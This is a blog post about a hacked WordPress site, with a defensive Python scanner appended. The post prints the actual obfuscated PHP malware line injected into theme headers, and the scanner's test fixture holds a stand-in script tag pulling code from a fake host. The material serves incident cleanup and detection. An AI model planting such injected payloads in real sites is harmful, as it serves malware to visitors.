My WordPress header.php Got Hacked – snxstat77.info
Today I went to look at some analytics and noticed that traffic was unusually low. I went to a popular wiki page that usually drives a lot of traffic to check whether my link was still there. It sure was, but when I clicked on it Chrome gave me a malware warning!
XSS Hack (cross site scripting)
If you search the page source for the offending website snxstat77.info you will not find anything. So I looked at the live DOM via Chrome's developer tools (or you can use Firebug) to search for the site, and sure enough I found it.
#32d494# echo(gzinflate(base64_decode("zVZtb5swEP4ts5CAotDYYF7msn2I9gv2McqHvMCgSkMCbqsm6n+fzy+EpE3Kqk2aFIh9 vrvnzvfC3bXLptryb7x5OeyyVb18fMg33F82+ZznP9Y57By0Qh6qxPOEXLbz59ttvllNymq9cnYeErTX5ZwvS2f37B7KbDTG5Ja yV1C5bWpe85dtblgWTb5o3EPLs5+8qTa/2H6f2fO1Lf/3T7bfPi5a3jiYBCNMiOvt96xts+mMFZldNLZn1w/iNSltVnhCspmoRb 3Kbfac8bJqWZ49T4spUprQzMEY1MzYJkOBTy14KIbX2MLUwqkVphYNBSFMgBrDC5jCFFahoFiECO6OFFuBVBLo/RkzjQBFSAApx FYoNYJ4kOhNJyHQcSKhtQmpEpNELBUAmQgoaigRqKLak3OPaHQOISiAAkuSnElGIIUNY6BMV4ZdwBl2V4nCVUbFR1cji6RXTMVU WQAnoIJ0V0GxvFnxAy8EBpwS3/AL4FQvY61UGAJ79SIaNJS4oRFWt0y1vVi7FwPaEZoEKgAdM9beYhNWZdwVCW0YTXtZ0/Mt0bq izgpDCborpCp+EksbKn/KKxVYqlw76pGu+IYMbOpyQH/U0QMdRx0npcvk9li6loA76iDWUrRPlX4EY4iuisrFEAsmHF3Lxj5Boi vTw+Qdf/DAvH+/YkwxRlKPbAYkNfUwIMtDneWSGvav8Gp7MCV/pQy64ldXNJYJHPX7j4lu3JUZxDQ+K7fEPysolZ7439fUe8a/q QDyJ6l/0greVoDybADix0XSIX1cK4NRT8up1ymGq+gV3ofyn8mTtz3wJFtOm9rfSs4LvXQQ8qe+TP/DVxx6R6wb9hFTCAWkl9/S MFANreliv0RTx8nd76hFX8Uk5qGtGNPWFRdjD5pb3eGjPjUTkeuyom6cKotGZIThYdWI0uBLNmaV57mH+6xiVeG03BXTV9t6Lfe Lpn6YlGLiErOWM8I35Y2DPXyzmd7PhLrXnWBjubMTy7tbPVX+Bg=="))); #/32d494#
Investigating the Hack
I am still in the middle of figuring out where the vulnerability is on my site. I recently (2 days ago) updated my WordPress install to 3.3.2 (the newest version) and this is the first time I have been hacked. I am not sure whether WordPress is to blame or not; either way I would like to find out how this happened.
I found this blog post that seems to explain what happened to my WordPress install. I also changed my password on my server and FTP accounts. Then I did a search to see how far this little hack had spread.
grep -R 'echo(gzinflate(base64_decode(' *
This revealed that ALL my WordPress themes were hacked.
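As an added example (not code from the original post), here is a small Python scanner that does what the grep above does across a theme tree, but also pulls each base64 blob out of the matching line and statically decodes it with zlib's raw-DEFLATE mode (wbits=-15), which is the format PHP's gzinflate() consumes. That lets you read what an injected block would have emitted without ever executing it. The theme tree, the payload string and the second marker value a1b2c3 are constructed here for the demonstration; only the 32d494 marker and the echo(gzinflate(base64_decode( shape come from the page.

```python
import base64
import os
import re
import tempfile
import zlib

# Shape of the injection found on the page:
#   #<hex># echo(gzinflate(base64_decode("..."))); #/<hex>#
# eval( is accepted as well (assumption: a common variant of the same trick).
INJECT_RE = re.compile(
    r'(?:echo|eval)\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*["\']'
    r'([A-Za-z0-9+/=\s]+)["\']',
    re.IGNORECASE,
)

# Constructed stand-in for whatever the real blob expands to; not the page's payload.
SAMPLE_PAYLOAD = '<script src="http://EXAMPLE-MALWARE-HOST.invalid/stat.js"></script>'


def php_gzinflate(blob_b64: str) -> bytes:
    """Reverse gzinflate(base64_decode(x)) offline: strip the line-wrapping
    whitespace, base64-decode, then inflate as raw DEFLATE (no zlib/gzip header)."""
    raw = base64.b64decode(re.sub(r"\s+", "", blob_b64))
    return zlib.decompress(raw, -15)


def scan_tree(root: str):
    """Walk every .php file under root and return a list of
    (path relative to root, line number, decoded payload text) for each hit."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for m in INJECT_RE.finditer(text):
                lineno = text.count("\n", 0, m.start()) + 1
                try:
                    payload = php_gzinflate(m.group(1)).decode("utf-8", "replace")
                except (ValueError, zlib.error) as exc:
                    payload = f"<undecodable: {exc}>"
                findings.append((os.path.relpath(path, root), lineno, payload))
    return findings


def make_injected_line(payload: str, marker: str = "32d494") -> str:
    """Build a line in the same shape as the one on the page from a harmless
    payload. Used only to create the test fixture below."""
    comp = zlib.compressobj(wbits=-15)          # raw DEFLATE, as gzinflate expects
    deflated = comp.compress(payload.encode()) + comp.flush()
    b64 = base64.b64encode(deflated).decode()
    return f'#{marker}# echo(gzinflate(base64_decode("{b64}"))); #/{marker}#'


def build_sample_site() -> str:
    """Create a constructed wp-content/themes tree: two injected header.php
    files and one clean footer.php. Returns the temporary root directory."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    themes = os.path.join(root, "wp-content", "themes")
    files = {
        "twentyeleven/header.php": "<?php " + make_injected_line(SAMPLE_PAYLOAD)
        + "\n<!DOCTYPE html>\n",
        "custom/header.php": "<?php\n// theme header\n"
        + make_injected_line(SAMPLE_PAYLOAD, "a1b2c3") + "\n",
        "custom/footer.php": "<?php wp_footer(); ?>\n",
    }
    for rel, body in files.items():
        full = os.path.join(themes, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for rel, lineno, payload in scan_tree(site):
        print(f"{rel}:{lineno}: {payload[:70]}")
```

Point it at the web root rather than just wp-content/themes: the grep with `*` skips dotfiles and anything outside the current directory, and an attacker who held an SSH/FTP account could have written anywhere that account could reach. Decoding the blob tells you what was served (the snxstat77.info reference will be inside it), which is also what you want to hand to Google's malware review after cleaning up.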
So far it doesn't look like a WordPress flaw, but more like my SSH/FTP account had been compromised. The intruder then noticed I had a WordPress site and decided to inject all my themes.